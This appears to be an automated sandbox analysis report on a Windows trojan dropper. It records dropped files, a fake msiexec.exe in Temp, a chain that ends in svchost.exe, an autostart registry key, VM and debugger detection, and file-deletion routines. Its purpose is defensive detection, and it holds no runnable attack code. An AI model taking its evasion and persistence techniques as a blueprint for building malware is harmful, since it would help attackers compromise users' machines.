Source: Zojemilocan.dll.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xuxokuxoka.dll.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Jahulocayedo.dll.5.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Hu25VEa8Dr.exe	ReversingLabs: Detection: 95%
Source: Hu25VEa8Dr.exe	Virustotal: Detection: 81%

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

File read: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Jump to behavior

Source: Hu25VEa8Dr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process created: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Process created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe "C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Process created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\syswow64\svchost.exe
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process created: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe C:\Users\user\AppData\Local\Temp\Sahofivizu.exe" "C:\Users\user\Desktop\Hu25VEa8Dr.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Process created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process created: C:\Users\user\Desktop\Hu25VEa8Dr.exe C:\Users\user\Desktop\Hu25VEa8Dr.exe	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe "C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe" "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Process created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe "C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\syswow64\svchost.exe	Jump to behavior

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171

Jump to behavior

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

File created: C:\Users\user\AppData\Local\Temp\nshA6F9.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@17/19@7/3

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,

0_2_00402020

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 0_2_004041FC GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004041FC

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 4_2_004014F0 _memset,_memset,_memset,_memset,_memset,GetTickCount,OpenMutexW,_memset,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,Process32NextW,GetTempPathW,CreateDirectoryW,CreateFileW,WriteFile,CloseHandle,ShellExecuteExW,ExpandEnvironmentStringsW,CreateDirectoryW,CreateDirectoryW,CreateDirectoryW,ExpandEnvironmentStringsW,GetTempPathW,CreateFileW,WriteFile,CloseHandle,ShellExecuteExW,WaitForSingleObject,WaitForSingleObject,FindFirstChangeNotificationW,WaitForSingleObject,FindNextChangeNotification,WaitForSingleObject,GetFileAttributesW,

4_2_004014F0

Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\TLS
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\1703032604

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 3_2_00402419 FindResourceA,SizeofResource,LoadResource,LockResource,Sleep,??2@YAPAXI@Z,??_U@YAPAXI@Z,

3_2_00402419

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Command line argument: TLS	4_2_004014F0
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Command line argument: avp.exe	4_2_004014F0
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Command line argument: \MSI	4_2_004014F0
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Command line argument: \msiexec.exe	4_2_004014F0
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Command line argument: \Temp	4_2_004014F0
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Command line argument: %USERPROFILE%	4_2_004014F0
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Command line argument: .exe	4_2_004014F0

Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source:	Binary string: T:\ldr\CUSTOM\local\Worm65.DLL.PnP\Release\Worm65.DLL.pdb source: svchost.exe, svchost.exe, 00000009.00000003.373478974.0000000000130000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381475492.00000000001E0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: T:\ldr\CUSTOM\local\local\Release\ADropper.pdb source: Hu25VEa8Dr.exe, Hu25VEa8Dr.exe, 00000004.00000002.351939006.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, 00000009.00000002.381614429.0000000000CD0000.00000040.80000000.00040000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Unpacked PE file: 3.2.Hu25VEa8Dr.exe.400000.0.unpack
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Unpacked PE file: 4.2.Hu25VEa8Dr.exe.400000.1.unpack
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Unpacked PE file: 7.2.msiexec.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Unpacked PE file: 3.2.Hu25VEa8Dr.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Unpacked PE file: 4.2.Hu25VEa8Dr.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Unpacked PE file: 7.2.msiexec.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Unpacked PE file: 8.2.msiexec.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Code function: 2_2_10003A20 push eax; ret	2_2_10003A4E
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 4_2_00403185 push ecx; ret	4_2_00403198
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Code function: 6_2_10003A20 push eax; ret	6_2_10003A4E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_001E5565 push ecx; ret	9_2_001E5578
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_001EE1CE push 0000006Ah; retf	9_2_001EE1D0

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 0_2_00405D2E GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405D2E

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\ProgramData\Local Settings\Temp\msoiruj.bat

Jump to dropped file

Source: C:\Windows\SysWOW64\svchost.exe

File created: C:\ProgramData\Local Settings\Temp\msoiruj.bat

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\Firozedikami.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	File created: C:\Users\user\AppData\Local\Temp\natigezeholi.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	File created: C:\ProgramData\Local Settings\Temp\msoiruj.bat	Jump to dropped file
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	File created: C:\Users\user\AppData\Local\Temp\xuxokuxoka.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\Jahulocayedo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	File created: C:\Users\user\AppData\Local\Temp\0BBFF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\yiduyevutog.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	File created: C:\Users\user\AppData\Local\Temp\Zojemilocan.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	File created: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	File created: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	File created: C:\Users\user\AppData\Local\Temp\Gozekeneka.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\naseropuxeq.dll	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Windows\SysWOW64\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 14108

Jump to behavior

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft 00E35EEE

Jump to behavior

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: vbox qemu qemu	8_2_0040141C
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: qemu qemu	8_2_004017AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: vbox qemu qemu	9_2_0008141C

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe

RDTSC instruction interceptor: First address: 0000000000401746 second address: 0000000000401749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 rdtsc

Source: C:\Windows\SysWOW64\svchost.exe TID: 1732

Thread sleep time: -120000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

graph_4-5883

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 4_2_00401220 rdtsc

4_2_00401220

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_4-6194

Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Disk\Enum name: 0

Jump to behavior

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe

Code function: 2_2_004012F0 ??2@YAPAXI@Z,GetCapture,GetMenu,GetMenuItemInfoA,malloc,GetSystemInfo,xupetipe,_ftol,Negefibizoh,fread,fclose,CreateHatchBrush,??2@YAPAXI@Z,Fetomekiratu,bedevahetay,

2_2_004012F0

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 0_2_00405D07 FindFirstFileA,FindClose,	0_2_00405D07
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 0_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405331
Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 5_2_00405D07 FindFirstFileA,FindClose,	5_2_00405D07
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 5_2_00405331 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_00405331
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 5_2_0040263E FindFirstFileA,	5_2_0040263E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_001E1E80 GetFileAttributesW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,MoveFileExW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,	9_2_001E1E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_001E1700 GetDriveTypeW,wsprintfW,wsprintfW,FindFirstFileW,DeleteFileW,wsprintfW,wsprintfW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,lstrcmpiW,lstrcmpiW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,lstrcmpiW,lstrcmpiW,wsprintfW,DeleteFileW,SetFileAttributesW,DeleteFileW,wsprintfW,SetFileAttributesW,FindNextFileW,FindClose,	9_2_001E1700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_001E1B70 wsprintfW,FindFirstFileW,RemoveDirectoryW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,FindClose,FindClose,	9_2_001E1B70

Source: C:\Windows\SysWOW64\svchost.exe

9_2_001E10D0

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	API call chain: ExitProcess graph end node	graph_0-2867
Source: C:\Users\user\AppData\Local\Temp\Sahofivizu.exe	API call chain: ExitProcess graph end node	graph_2-1863
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	API call chain: ExitProcess graph end node	graph_5-2844
Source: C:\Users\user\AppData\Local\Temp\Lohonibuhod.exe	API call chain: ExitProcess graph end node	graph_6-1864
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\svchost.exe	API call chain: ExitProcess graph end node

Source: msiexec.exe, 00000007.00000002.365371579.000000000042D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.365418173.0000000000876000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.365771183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.381464840.0000000000080000.00000040.80000000.00040000.00000000.sdmp

Binary or memory string: qemut!

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 4_2_00401999 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_00401999

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 0_2_00405D2E GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405D2E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 9_2_00020973 GetProcessHeap,GetVersionExA,NtQueryInformationProcess,NtDelayExecution,VirtualAlloc,GetEnvironmentVariableW,SetEnvironmentVariableW,GetShortPathNameW,wsprintfA,CreateMutexA,GetLastError,SetFileAttributesW,DeleteFileW,VirtualFree,WSAStartup,CreateThread,CloseHandle,CreateThread,CloseHandle,CreateThread,WaitForSingleObject,CloseHandle,NtDelayExecution,SetFileAttributesW,DeleteFileW,VirtualFree,ExitProcess,SetErrorMode,

9_2_00020973

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe

Code function: 4_2_00401220 rdtsc

4_2_00401220

Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 8_2_00401284 mov ebx, dword ptr fs:[00000030h]	8_2_00401284
Source: C:\Users\user\AppData\Local\Temp\MSI\msiexec.exe	Code function: 8_2_0040141C mov eax, dword ptr fs:[00000030h]	8_2_0040141C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00081284 mov ebx, dword ptr fs:[00000030h]	9_2_00081284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_0008141C mov eax, dword ptr fs:[00000030h]	9_2_0008141C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00020550 mov ebx, dword ptr fs:[00000030h]	9_2_00020550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_00020973 mov eax, dword ptr fs:[00000030h]	9_2_00020973
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 9_2_000219D1 mov eax, dword ptr fs:[00000030h]	9_2_000219D1

Source: C:\Windows\SysWOW64\svchost.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

9_2_001E10D0

Source: C:\Users\user\Desktop\Hu25VEa8Dr.exe	Code function: 4_2_00401999 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00401999
